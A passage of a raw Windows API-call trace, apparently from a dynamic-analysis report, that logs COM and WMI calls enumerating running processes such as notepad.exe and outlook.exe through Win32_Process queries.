WbemDefPath:IUnknown:Release (This=0x561aba0) returned 0x2 [0214.174] WbemDefPath:IUnknown:Release (This=0x561aba0) returned 0x1 [0214.174] CoGetContextToken (in: pToken=0x38ee54 | out: pToken=0x38ee54) returned 0x0 [0214.174] CoGetContextToken (in: pToken=0x38edb4 | out: pToken=0x38edb4) returned 0x0 [0214.174] WbemDefPath:IUnknown:QueryInterface (in: This=0x561aba0, riid=0x38ee84*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x38ee80 | out: ppvObject=0x38ee80*=0x561aba0) returned 0x0 [0214.174] WbemDefPath:IUnknown:AddRef (This=0x561aba0) returned 0x3 [0214.174] WbemDefPath:IUnknown:Release (This=0x561aba0) returned 0x2 [0214.174] WbemDefPath:IWbemPath:SetText (This=0x561aba0, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2976\"") returned 0x0 [0214.174] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38f000 | out: puCount=0x38f000*=0x2) returned 0x0 [0214.174] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38effc*=0x0, pszText=0x0 | out: puBuffLength=0x38effc*=0xf, pszText=0x0) returned 0x0 [0214.174] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38effc*=0xf, pszText="00000000000000" | out: puBuffLength=0x38effc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0214.174] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38efcc | out: puCount=0x38efcc*=0x2) returned 0x0 [0214.174] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc8*=0x0, pszText=0x0 | out: puBuffLength=0x38efc8*=0xf, pszText=0x0) returned 0x0 [0214.174] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc8*=0xf, pszText="00000000000000" | out: puBuffLength=0x38efc8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0214.174] IWbemClassObject:Get (in: This=0x562ded0, wszName="Name", lFlags=0, pVal=0x38efc8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x268ddf8*=0, plFlavor=0x268ddfc*=0 | out: pVal=0x38efc8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="notepad.exe", varVal2=0x0), pType=0x268ddf8*=8, plFlavor=0x268ddfc*=0) returned 0x0 [0214.174] SysStringByteLen (bstr="notepad.exe") returned 0x16 [0214.174] SysStringByteLen (bstr="notepad.exe") returned 0x16 [0214.174] IWbemClassObject:Get (in: This=0x562ded0, wszName="Name", lFlags=0, pVal=0x38efd0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x268ddf8*=8, plFlavor=0x268ddfc*=0 | out: pVal=0x38efd0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="notepad.exe", varVal2=0x0), pType=0x268ddf8*=8, plFlavor=0x268ddfc*=0) returned 0x0 [0214.175] SysStringByteLen (bstr="notepad.exe") returned 0x16 [0214.175] SysStringByteLen (bstr="notepad.exe") returned 0x16 [0214.175] CoTaskMemAlloc (cb=0x4) returned 0x561c068 [0214.175] IEnumWbemClassObject:Next (in: This=0x544f098, lTimeout=-1, uCount=0x1, apObjects=0x561c068, puReturned=0x267acc0 | out: apObjects=0x561c068*=0x562e068, puReturned=0x267acc0*=0x1) returned 0x0 [0214.176] IUnknown:QueryInterface (in: This=0x562e068, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e62c | out: ppvObject=0x38e62c*=0x562e068) returned 0x0 [0214.176] IUnknown:QueryInterface (in: This=0x562e068, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e5e0 | out: ppvObject=0x38e5e0*=0x0) returned 0x80004002 [0214.176] IUnknown:QueryInterface (in: This=0x562e068, riid=0x725f1e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38e408 | out: ppvObject=0x38e408*=0x0) returned 0x80004002 [0214.176] IUnknown:AddRef (This=0x562e068) returned 0x3 [0214.176] IUnknown:QueryInterface (in: This=0x562e068, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38df3c | out: ppvObject=0x38df3c*=0x0) returned 0x80004002 [0214.176] IUnknown:QueryInterface (in: This=0x562e068, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38deec | out: ppvObject=0x38deec*=0x0) returned 0x80004002 [0214.176] IUnknown:QueryInterface (in: This=0x562e068, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38def8 | out: ppvObject=0x38def8*=0x562e06c) returned 0x0 [0214.176] IMarshal:GetUnmarshalClass (in: This=0x562e06c, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38df00 | out: pCid=0x38df00*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0214.177] IUnknown:Release (This=0x562e06c) returned 0x3 [0214.177] CoGetContextToken (in: pToken=0x38df58 | out: pToken=0x38df58) returned 0x0 [0214.177] CoGetContextToken (in: pToken=0x38e36c | out: pToken=0x38e36c) returned 0x0 [0214.177] IUnknown:QueryInterface (in: This=0x562e068, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e3ec | out: ppvObject=0x38e3ec*=0x0) returned 0x80004002 [0214.177] IUnknown:Release (This=0x562e068) returned 0x2 [0214.177] CoGetContextToken (in: pToken=0x38e954 | out: pToken=0x38e954) returned 0x0 [0214.177] CoGetContextToken (in: pToken=0x38e8b4 | out: pToken=0x38e8b4) returned 0x0 [0214.177] IUnknown:QueryInterface (in: This=0x562e068, riid=0x38e984*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x38e980 | out: ppvObject=0x38e980*=0x562e068) returned 0x0 [0214.177] IUnknown:AddRef (This=0x562e068) returned 0x4 [0214.177] IUnknown:Release (This=0x562e068) returned 0x3 [0214.177] IUnknown:Release (This=0x562e068) returned 0x2 [0214.177] CoTaskMemFree (pv=0x561c068) [0214.177] CoGetContextToken (in: pToken=0x38ecc4 | out: pToken=0x38ecc4) returned 0x0 [0214.177] IUnknown:AddRef (This=0x562e068) returned 0x3 [0214.177] IWbemClassObject:Get (in: This=0x562e068, wszName="__GENUS", lFlags=0, pVal=0x38efc4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f044*=0, plFlavor=0x38f040*=0 | out: pVal=0x38efc4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x38f044*=3, plFlavor=0x38f040*=64) returned 0x0 [0214.178] IWbemClassObject:Get (in: This=0x562e068, wszName="__PATH", lFlags=0, pVal=0x38efa8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f02c*=0, plFlavor=0x38f028*=0 | out: pVal=0x38efa8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2984\"", varVal2=0x0), pType=0x38f02c*=8, plFlavor=0x38f028*=64) returned 0x0 [0214.178] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2984\"") returned 0x66 [0214.178] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2984\"") returned 0x66 [0214.178] CoGetObjectContext (in: riid=0x25c02c4*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38efd4 | out: ppv=0x38efd4*=0x6d0cac) returned 0x0 [0214.178] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6d0cac, pAptType=0x38efcc | out: pAptType=0x38efcc*=1) returned 0x0 [0214.178] IUnknown:QueryInterface (in: This=0x6d0cac, riid=0x25c02ac*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x38efd0 | out: ppvObject=0x38efd0*=0x0) returned 0x80004002 [0214.178] IUnknown:Release (This=0x6d0cac) returned 0x1 [0214.179] CoGetClassObject (in: rclsid=0x55b3f5c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x72656bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38e940 | out: ppv=0x38e940*=0x561c068) returned 0x0 [0214.179] WbemDefPath:IUnknown:QueryInterface (in: This=0x561c068, riid=0x7261dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38eb58 | out: ppvObject=0x38eb58*=0x0) returned 0x80004002 [0214.179] WbemDefPath:IClassFactory:CreateInstance (in: This=0x561c068, pUnkOuter=0x0, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38eb64 | out: ppvObject=0x38eb64*=0x561ac80) returned 0x0 [0214.179] WbemDefPath:IUnknown:Release (This=0x561c068) returned 0x0 [0214.180] WbemDefPath:IUnknown:QueryInterface (in: This=0x561ac80, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e784 | out: ppvObject=0x38e784*=0x561ac80) returned 0x0 [0214.180] WbemDefPath:IUnknown:QueryInterface (in: This=0x561ac80, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e738 | out: ppvObject=0x38e738*=0x0) returned 0x80004002 [0214.180] WbemDefPath:IUnknown:AddRef (This=0x561ac80) returned 0x3 [0214.180] WbemDefPath:IUnknown:QueryInterface (in: This=0x561ac80, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38e094 | out: ppvObject=0x38e094*=0x0) returned 0x80004002 [0214.180] WbemDefPath:IUnknown:QueryInterface (in: This=0x561ac80, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38e044 | out: ppvObject=0x38e044*=0x0) returned 0x80004002 [0214.180] WbemDefPath:IUnknown:QueryInterface (in: This=0x561ac80, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e050 | out: ppvObject=0x38e050*=0x561c078) returned 0x0 [0214.180] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x561c078, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38e058 | out: pCid=0x38e058*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0214.180] WbemDefPath:IUnknown:Release (This=0x561c078) returned 0x3 [0214.180] CoGetContextToken (in: pToken=0x38e0b0 | out: pToken=0x38e0b0) returned 0x0 [0214.180] CoGetContextToken (in: pToken=0x38e4c4 | out: pToken=0x38e4c4) returned 0x0 [0214.180] WbemDefPath:IUnknown:QueryInterface (in: This=0x561ac80, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e544 | out: ppvObject=0x38e544*=0x0) returned 0x80004002 [0214.180] WbemDefPath:IUnknown:Release (This=0x561ac80) returned 0x2 [0214.180] WbemDefPath:IUnknown:Release (This=0x561ac80) returned 0x1 [0214.181] CoGetContextToken (in: pToken=0x38ee54 | out: pToken=0x38ee54) returned 0x0 [0214.181] CoGetContextToken (in: pToken=0x38edb4 | out: pToken=0x38edb4) returned 0x0 [0214.181] WbemDefPath:IUnknown:QueryInterface (in: This=0x561ac80, riid=0x38ee84*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x38ee80 | out: ppvObject=0x38ee80*=0x561ac80) returned 0x0 [0214.181] WbemDefPath:IUnknown:AddRef (This=0x561ac80) returned 0x3 [0214.181] WbemDefPath:IUnknown:Release (This=0x561ac80) returned 0x2 [0214.181] WbemDefPath:IWbemPath:SetText (This=0x561ac80, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2984\"") returned 0x0 [0214.181] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38f000 | out: puCount=0x38f000*=0x2) returned 0x0 [0214.181] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38effc*=0x0, pszText=0x0 | out: puBuffLength=0x38effc*=0xf, pszText=0x0) returned 0x0 [0214.181] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38effc*=0xf, pszText="00000000000000" | out: puBuffLength=0x38effc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0214.181] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38efcc | out: puCount=0x38efcc*=0x2) returned 0x0 [0214.181] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc8*=0x0, pszText=0x0 | out: puBuffLength=0x38efc8*=0xf, pszText=0x0) returned 0x0 [0214.181] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc8*=0xf, pszText="00000000000000" | out: puBuffLength=0x38efc8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0214.181] IWbemClassObject:Get (in: This=0x562e068, wszName="Name", lFlags=0, pVal=0x38efc8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x268e664*=0, plFlavor=0x268e668*=0 | out: pVal=0x38efc8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="outlook.exe", varVal2=0x0), pType=0x268e664*=8, plFlavor=0x268e668*=0) returned 0x0 [0214.181] SysStringByteLen (bstr="outlook.exe") returned 0x16 [0214.181] SysStringByteLen (bstr="outlook.exe") returned 0x16 [0214.181] IWbemClassObject:Get (in: This=0x562e068, wszName="Name", lFlags=0, pVal=0x38efd0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x268e664*=8, plFlavor=0x268e668*=0 | out: pVal=0x38efd0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="outlook.exe", varVal2=0x0), pType=0x268e664*=8, plFlavor=0x268e668*=0) returned 0x0 [0214.181] SysStringByteLen (bstr="outlook.exe") returned 0x16 [0214.182] SysStringByteLen (bstr="outlook.exe") returned 0x16 [0214.182] CoTaskMemAlloc (cb=0x4) returned 0x561c0a8 [0214.182] IEnumWbemClassObject:Next (in: This=0x544f098, lTimeout=-1, uCount=0x1, apObjects=0x561c0a8, puReturned=0x267acc0 | out: apObjects=0x561c0a8*=0x562e200, puReturned=0x267acc0*=0x1) returned 0x0 [0214.183] IUnknown:QueryInterface (in: This=0x562e200, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e62c | out: ppvObject=0x38e62c*=0x562e200) returned 0x0 [0214.183] IUnknown:QueryInterface (in: This=0x562e200, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e5e0 | out: ppvObject=0x38e5e0*=0x0) returned 0x80004002 [0214.183] IUnknown:QueryInterface (in: This=0x562e200, riid=0x725f1e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38e408 | out: ppvObject=0x38e408*=0x0) returned 0x80004002 [0214.183] IUnknown:AddRef (This=0x562e200) returned 0x3 [0214.184] IUnknown:QueryInterface (in: This=0x562e200, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38df3c | out: ppvObject=0x38df3c*=0x0) returned 0x80004002 [0214.184] IUnknown:QueryInterface (in: This=0x562e200, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38deec | out: ppvObject=0x38deec*=0x0) returned 0x80004002 [0214.184] IUnknown:QueryInterface (in: This=0x562e200, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38def8 | out: ppvObject=0x38def8*=0x562e204) returned 0x0 [0214.184] IMarshal:GetUnmarshalClass (in: This=0x562e204, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38df00 | out: pCid=0x38df00*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0214.184] IUnknown:Release (This=0x562e204) returned 0x3 [0214.184] CoGetContextToken (in: pToken=0x38df58 | out: pToken=0x38df58) returned 0x0 [0214.184] CoGetContextToken (in: pToken=0x38e36c | out: pToken=0x38e36c) returned 0x0 [0214.184] IUnknown:QueryInterface (in: This=0x562e200, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e3ec | out: ppvObject=0x38e3ec*=0x0) returned 0x80004002 [0214.184] IUnknown:Release (This=0x562e200) returned 0x2 [0214.184] CoGetContextToken (in: pToken=0x38e954 | out: pToken=0x38e954) returned 0x0 [0214.184] CoGetContextToken (in: pToken=0x38e8b4 | out: pToken=0x38e8b4) returned 0x0 [0214.184] IUnknown:QueryInterface (in: This=0x562e200, riid=0x38e984*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x38e980 | out: ppvObject=0x38e980*=0x562e200) returned 0x0 [0214.184] IUnknown:AddRef (This=0x562e200) returned 0x4 [0214.184] IUnknown:Release (This=0x562e200) returned 0x3 [0214.184] IUnknown:Release (This=0x562e200) returned 0x2 [0214.184] CoTaskMemFree (pv=0x561c0a8) [0214.185] CoGetContextToken (in: pToken=0x38ecc4 | out: pToken=0x38ecc4) returned 0x0 [0214.185] IUnknown:AddRef (This=0x562e200) returned 0x3 [0214.185] IWbemClassObject:Get (in: This=0x562e200, wszName="__GENUS", lFlags=0, pVal=0x38efc4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f044*=0, plFlavor=0x38f040*=0 | out: pVal=0x38efc4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x38f044*=3, plFlavor=0x38f040*=64) returned 0x0 [0214.185] IWbemClassObject:Get (in: This=0x562e200, wszName="__PATH", lFlags=0, pVal=0x38efa8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f02c*=0, plFlavor=0x38f028*=0 | out: pVal=0x38efa8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2992\"", varVal2=0x0), pType=0x38f02c*=8, plFlavor=0x38f028*=64) returned 0x0 [0214.185] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2992\"") returned 0x66 [0214.185] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2992\"") returned 0x66 [0214.185] CoGetObjectContext (in: riid=0x25c02c4*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38efd4 | out: ppv=0x38efd4*=0x6d0cac) returned 0x0 [0214.185] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6d0cac, pAptType=0x38efcc | out: pAptType=0x38efcc*=1) returned 0x0 [0214.186] IUnknown:QueryInterface (in: This=0x6d0cac, riid=0x25c02ac*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x38efd0 | out: ppvObject=0x38efd0*=0x0) returned 0x80004002 [0214.186] IUnknown:Release (This=0x6d0cac) returned 0x1 [0214.186] CoGetClassObject (in: rclsid=0x55b3f5c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x72656bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38e940 | out: ppv=0x38e940*=0x561c0a8) returned 0x0 [0214.187] WbemDefPath:IUnknown:QueryInterface (in: This=0x561c0a8, riid=0x7261dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38eb58 | out: ppvObject=0x38eb58*=0x0) returned 0x80004002 [0214.187] WbemDefPath:IClassFactory:CreateInstance (in: This=0x561c0a8, pUnkOuter=0x0, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38eb64 | out: ppvObject=0x38eb64*=0x5630858) returned 0x0 [0214.187] WbemDefPath:IUnknown:Release (This=0x561c0a8) returned 0x0 [0214.187] WbemDefPath:IUnknown:QueryInterface (in: This=0x5630858, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e784 | out: ppvObject=0x38e784*=0x5630858) returned 0x0 [0214.187] WbemDefPath:IUnknown:QueryInterface (in: This=0x5630858, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e738 | out: ppvObject=0x38e738*=0x0) returned 0x80004002 [0214.187] WbemDefPath:IUnknown:AddRef (This=0x5630858) returned 0x3 [0214.187] WbemDefPath:IUnknown:QueryInterface (in: This=0x5630858, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38e094 | out: ppvObject=0x38e094*=0x0) returned 0x80004002 [0214.187] WbemDefPath:IUnknown:QueryInterface (in: This=0x5630858, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38e044 | out: ppvObject=0x38e044*=0x0) returned 0x80004002 [0214.187] WbemDefPath:IUnknown:QueryInterface (in: This=0x5630858, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e050 | out: ppvObject=0x38e050*=0x561c0b8) returned 0x0 [0214.188] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x561c0b8, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38e058 | out: pCid=0x38e058*(Data1=0x33a, 